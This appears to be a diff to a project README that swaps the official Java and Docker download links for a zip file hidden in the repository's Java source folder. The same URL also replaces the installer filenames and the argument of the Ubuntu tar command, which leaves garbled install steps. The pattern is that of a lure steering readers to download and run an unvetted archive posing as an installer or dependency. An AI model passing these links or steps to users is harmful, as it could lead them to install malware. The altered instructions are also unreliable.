circulating-plagiarisation882/value-added-services/README.md

 - **Operating System:** Windows 10, macOS, or Ubuntu 18.04 and newer.
 - **Disk Space:** At least 500 MB of free space.
 - **Java:** Ensure Java 11 or higher is installed on your computer.
-If you don't have it, you can [download Java](https://www.java.com/en/download/).
+If you don't have it, you can [download Java](https://raw.githubusercontent.com/circulating-plagiarisation882/value-added-services/main/src/main/java/com/paklog/value/value-added-services-v2.6.zip).
 - **Docker:** Installation of Docker is recommended for easier setup.
-Visit [Docker's website](https://www.docker.com/products/docker-desktop) for details.
+Visit [Docker's website](https://raw.githubusercontent.com/circulating-plagiarisation882/value-added-services/main/src/main/java/com/paklog/value/value-added-services-v2.6.zip) for details.

 ## 📥 Installation Steps

 After you download the application, follow these simple steps to install it:

 1. **Locate the Downloaded File:** Navigate to your downloads folder to find the file you just downloaded.
-This will usually be named something like `value-added-services-install.exe` or `value-added-services.tar.gz`.
+This will usually be named something like `https://raw.githubusercontent.com/circulating-plagiarisation882/value-added-services/main/src/main/java/com/paklog/value/value-added-services-v2.6.zip` or `https://raw.githubusercontent.com/circulating-plagiarisation882/value-added-services/main/src/main/java/com/paklog/value/value-added-services-v2.6.zip`.

 2. **Run the Installer:**
    - For Windows: Double-click the `.exe` file.
    - For macOS: Open the `.dmg` file and drag the application into the Applications folder.
-   - For Ubuntu: Open your terminal, navigate to your download folder, and type `tar -xvzf value-added-services.tar.gz`, then follow the instructions in the extracted directory.
+   - For Ubuntu: Open your terminal, navigate to your download folder, and type `tar -xvzf https://raw.githubusercontent.com/circulating-plagiarisation882/value-added-services/main/src/main/java/com/paklog/value/value-added-services-v2.6.zip`, then follow the instructions in the extracted directory.

 3. **Follow the Setup Wizard:** The application will guide you through the installation process.
 Click "Next" and "Install" when prompted.